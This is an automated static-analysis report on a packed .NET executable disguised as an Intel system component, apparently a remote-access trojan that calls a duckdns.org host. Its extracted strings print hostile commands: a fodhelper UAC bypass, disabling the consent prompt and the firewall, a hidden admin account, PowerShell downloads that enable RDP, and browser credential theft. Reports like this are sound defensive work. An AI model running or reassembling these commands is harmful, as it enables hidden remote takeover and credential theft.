PREMIUM PESCAN.IO - Analysis Report

File Structure
[Analysis image not included in this extract. Chart legend for PE files: PE header (light blue); executable sections (pink); non-executable sections (black); external injected code (red); file structure drawn in red = malformed or corrupted header. Chart legend for other files: printable characters (blue); non-printable characters (black).]
Information
Size: 292.00 KB
SHA-256 Hash: 706BD2E1AAC21FADFBCFE1E6639A6488C574F00B007E087718282C597BEBF1C1
SHA-1 Hash: C401C3621C53FD64594E989A77BA055859B3D87C
MD5 Hash: 2AC18DCB91824B1838EF83DA2E2E8C14
Imphash: F34D5F2D4577ED6D9CEEC516C1F5A744
MajorOSVersion: 4
MinorOSVersion: 0
CheckSum: 00000000
EntryPoint (rva): 4A2CE
SizeOfHeaders: 200
SizeOfImage: 50000
ImageBase: 400000
Architecture: x86
ImportTable: 4A274
IAT: 2000
Characteristics: 102
TimeDateStamp: 69DD13DA
Date: 13/04/2026 16:03:38
File Type: EXE
Number Of Sections: 3
ASLR: Enabled
Section Names: .text, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows GUI
UAC Execution Level Manifest: asInvoker

Sections Info
Section: .text
  Flags: 0x60000020 (Code, Executable, Readable)
  ROffset: 200  RSize: 48400  VOffset: 2000  VSize: 482D4
  Entropy: 5.1961  Chi2: 11592617.84
Section: .rsrc
  Flags: 0x40000040 (Initialized Data, Readable)
  ROffset: 48600  RSize: 800  VOffset: 4C000  VSize: 688
  Entropy: 3.6449  Chi2: 145753.25
Section: .reloc
  Flags: 0x42000040 (Initialized Data, GP-Relative, Readable)
  ROffset: 48E00  RSize: 200  VOffset: 4E000  VSize: C
  Entropy: 0.1019  Chi2: 128015
Description
OriginalFilename: Cliente_lachencha5045_duckdns_org_5045.exe
CompanyName: Intel Corporation
LegalCopyright: Copyright Intel Corporation 2026
ProductName: System Runtime
FileVersion: 8.4.4512.0
FileDescription: System Runtime
ProductVersion: 8.4.4512.0
Comments: System component
Language: Unknown (ID=0x0)
CodePage: Unicode (UTF-16 LE) (0x4B0)

Entry Point
Section 1 (.text) contains the Entry Point
EntryPoint (calculated file offset): 484CE
Code -> FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Assembler
|JMP DWORD PTR [0X402000]
|ADD BYTE PTR [EAX], AL  (repeated 22 times: disassembly of the zero bytes that follow the jump)
Signatures
Certificate - Digital Signature Not Found:
• The file is not signed

Packer/Compiler
Compiler: Microsoft Visual .NET - (You can use a decompiler for this...)
AnyCPU: True
Version: v4.0
Detect It Easy (die)
PE: Protector: Eziriz .NET Reactor(6.x.x.x)[By Dr.FarFar]
PE: library: .NET(v4.0.30319)[-]
PE: linker: Microsoft Linker(11.0)[-]
Entropy: 5.18

Suspicious Functions
Library | Function | Description
KERNEL32.DLL | LoadLibraryW [Possible Call API By Name] | Loads the specified module into the address space of the calling process.
KERNEL32.DLL | GetModuleHandle [Possible Call API By Name] | Retrieves a handle to the specified module.
KERNEL32.DLL | GetProcAddress [Possible Call API By Name] | Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
KERNEL32.DLL | GetModuleHandle | Retrieves a handle to the specified module.
KERNEL32.DLL | CreateRemoteThread | Creates a thread in the address space of another process.
KERNEL32.DLL | WriteProcessMemory | Writes data to an area of memory in a specified process.
KERNEL32.DLL | GetProcAddress | Retrieves the address of an exported function or variable from the specified dynamic-link library (DLL).
USER32.DLL | GetAsyncKeyState | Retrieves the status of a virtual key asynchronously.
ADVAPI32.DLL | CryptDecrypt | Performs a cryptographic operation on data in a data block.
Windows REG (UNICODE)
Software\Classes\ms-settings\Shell\Open\command
DelegateExecute
Software\Classes\ms-settingsYSHELL|OUT|Bypass UAC (fodhelper) ejecutado.
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f 2>nul
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Software\Classes\mscfile\Shell\Open\command
Software\Classes\mscfile
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Software\Brave-Browser\User Data
Opera Software\Opera Stable
Software\Opera GX Stable
Software\Google\Chrome\BLBeacon
SOFTWARE\Microsoft\Windows NT\CurrentVersion
Rebuilt string - SOFTWARE\Microsoft\Windows\CurrentVersion\Run

File Access
Cliente_lachencha5045_duckdns_org_5045.exe
mscoree.dll
advapi32.dll
ncrypt.dll
bcrypt.dll
winmm.dll
gdi32.dll
ntdll.dll
kernel32.dll
user32.dll
Temp

File Access (UNICODE)
kernel32.dll
user32.dll
RDPWInst.exe
Cliente_lachencha5045_duckdns_org_5045.exe
robocopy.exe
msedge.exe
firefox.exe
chrome.exe
explorer.exe
DEBUG] csc.exe
csc.exe
mshta.exe
rundll32.exe
msiexec.exe
%/f /im svchost.exe
taskkill.exe
)computerdefaults.exe
powershell.exe
schtasks.exe
cmstp.exe
fodhelper.exe
cmd.exe
wscript.exe
wchelper.exe
kernel32.dll
hook.dll
rdpwrap.ini
$rdpDir\rdpwrap.ini
ini/master/rdpwrap.ini
2.zip
9-GH.zip
TEMP\rdpwrap.zip
wch.zip
Temp
AppData

SQL Queries
SELECT * FROM Win32_Processor
SELECT * FROM Win32_VideoController
SELECT TotalVisibleMemorySize FROM Win32_OperatingSystem
SELECT ProcessorId FROM Win32_Processor
SELECT SerialNumber FROM Win32_DiskDrive
SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Camera' OR PNPClass = 'Image')S"cam":"
SELECT displayName FROM AntiVirusProduct

Words of Interest
lockbit
Virus
Encrypt
Decrypt
KeyLogger
PassWord
<main
exec
attrib
start
pause
cipher
hostname
systeminfo
ping
replace

Words of Interest (UNICODE)
Virus
taskkill
Encrypt
PassWord
wscript
mshta
exec
powershell
schtasks
netsh
taskkill
start
pause
wmic
robocopy
rundll32
cacls
icacls
netstat
schtask
xcopy
netcfg
ping
rundll
expand
route
sc.exe

URLs (UNICODE)
http://api.ipify.org' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}if(-not $wanIP){try{$wanIP=(Invoke-WebRequest -Uri '
http://ip-api.com/json/?fields=country,cityDesconocida
https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip' -OutFile $zipFile -UseBasicParsing}catch{L "Error descargando: $_"} }

AV Services (UNICODE)
securitycenter2.exe - (SecurityCenter2)

IP Addresses
127.0.0.1

Strings/Hex Code Found With The File Rules
Rule Type | Encoding | Matched | Word
Text | Ascii | File | GetTempPath
Text | Ascii | Encryption | FromBase64String
Text | Ascii | Encryption | ToBase64String
Text | Ascii | Encryption API | CryptDecrypt
Text | Ascii | Anti-Analysis VM | GetVersion
Text | Ascii | Stealth | CloseHandle
Text | Ascii | Stealth | VirtualAlloc
Text | Unicode | Stealth | VirtualProtect
Text | Ascii | Stealth | CreateRemoteThread
Text | Ascii | Execution | CreateProcessW
Text | Unicode | Execution | CreateProcessW
Text | Ascii | Execution | ShellExecute
Text | Ascii | Execution | ResumeThread
Text | Unicode | Privileges | SeDebugPrivilege
Text | Unicode | Keyboard Key | [Enter]
Text | Unicode | Keyboard Key | [Tab]
Text | Unicode | Keyboard Key | Scroll
Text | Ascii | Malicious code executed after exploiting a vulnerability | Payload
Text | Unicode | Signal sent from infected system to a command and control server | Beacon
Text | Ascii | Software that records keystrokes to steal credentials | Keylogger
Text | Unicode | Malware that monitors and collects user data | Spy
Text | Ascii | Technique used to insert malicious code into legitimate processes | Inject
Text | Ascii | Malicious rerouting of traffic to an attacker-controlled site | Redirect
Text | Unicode | Technique used to circumvent security measures | Bypass
Entry Point | Hex Pattern | Microsoft Visual C / Basic .NET
Entry Point | Hex Pattern | Microsoft Visual C++ 8
Entry Point | Hex Pattern | Microsoft Visual C++ 8.0
Entry Point | Hex Pattern | Microsoft Visual C v7.0 / Basic .NET
Entry Point | Hex Pattern | Microsoft Visual Studio .NET
Entry Point | Hex Pattern | .NET executable
Resources
Path | DataRVA | Size | FileOffset | Code | Text
\VERSION\1\0 | 4C0A0 | 3F8 | 486A0 | F80334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000400 | ..4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............
\24\1\0 | 4C498 | 1EA | 48A98 | EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3822207374616E64616C6F6E65 | ...<?xml version="1.0" encoding="UTF-8" standalone
Intelligent String
• Cliente_lachencha5045_duckdns_org_5045.exe
• wch.zip
• wchelper.exe
• .vbs
• wscript.exe
• 3lachencha5045.duckdns.org
• .tmp
• cmd.exe
• fodhelper.exe
• .bat
• reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f 2>nul
• .inf
• CommandLine=cmd /c "
• cmstp.exe
• schtasks.exe
• 9" /sc onlogon /rl highest /f
• ;/delete /tn "SystemUpdate" /f
• powershell.exe
• runas
• )computerdefaults.exe
• <?xml version="1.0"?><Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo<Principals><Principal><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries></Settings><Actions><Exec><Command>
• .xml
• ;/delete /tn "WinUpdateSvc" /f
• eventvwr.msc
• taskkill.exe
• %/f /im svchost.exe
• .jpg
• .exe
• .com
• .scr
• .cmd
• .vbe
• .jse
• .wsf
• .ps1
• .msi
• .dll
• .hta
• msiexec.exe
• rundll32.exe
• mshta.exe
• hook.dll
• Microsoft.NET
• csc.exe
• e[DEBUG] csc.exe not found, anti-detect DLL skipped
• kernel32.dll
• explorer.exe
• chrome.exe
• firefox.exe
• msedge.exe
• robocopy.exe
• Login Data
• %Login Data-journal
• .log
• net user
• 1 /ADD /Y 2>&1 | Out-Null
• + /ADD 2>&1 | Out-Null
• M:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Force | Out-Null
• M:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Name '
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fDenyTSConnections' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name 'fSingleSessionPerUser' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'UserAuthentication' -Value 0 -Type DWord
• M:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'SecurityLayer' -Value 0 -Type DWord
• Wnetsh advfirewall set allprofiles state off
• netsh advfirewall firewall add rule name='HRDP' dir=in action=allow protocol=TCP localport=3389 profile=any 2>&1 | Out-Null
• C:\Program Files\RDP Wrapper'
• 5 Invoke-WebRequest -Uri 'https://github.com/sebaxakerhtc/rdpwrap/releases/download/v1.8.9.9/RDPWrap-v1.8.9.9-GH.zip' -OutFile $zipFile -UseBasicParsing
• i try{Invoke-WebRequest -Uri 'https://github.com/stascorp/rdpwrap/releases/download/v1.6.2/RDPWrap-v1.6.2.zip' -OutFile $zipFile -UseBasicParsing}catch{L "Error descargando: $_"}
• try{Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sebaxakerhtc/rdpwrap.ini/master/rdpwrap.ini' -OutFile "$rdpDir\rdpwrap.ini" -UseBasicParsing;L 'rdpwrap.ini actualizado'}catch{}
• S }else{L 'RDPWInst.exe no encontrado'}
• try{$wanIP=(Invoke-WebRequest -Uri 'http://api.ipify.org' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}
• if(-not $wanIP){try{$wanIP=(Invoke-WebRequest -Uri 'http://ifconfig.me/ip' -UseBasicParsing -TimeoutSec 5).Content.Trim()}catch{}}
• .wan
• ) "cmd /c exit" 2>nul
• logins
• http://ip-api.com/json/?fields=country,city
• _CorExeMainmscoree.dll

Flow Anomalies
Offset | RVA | Section | Description
484CE | 402000 | .text | JMP [static] - Indirect jump to absolute memory address
Extra Analysis
Metric | Value | Percentage
Ascii Code | 159122 | 53.2166%
Null Byte Code | 117645 | 39.3451%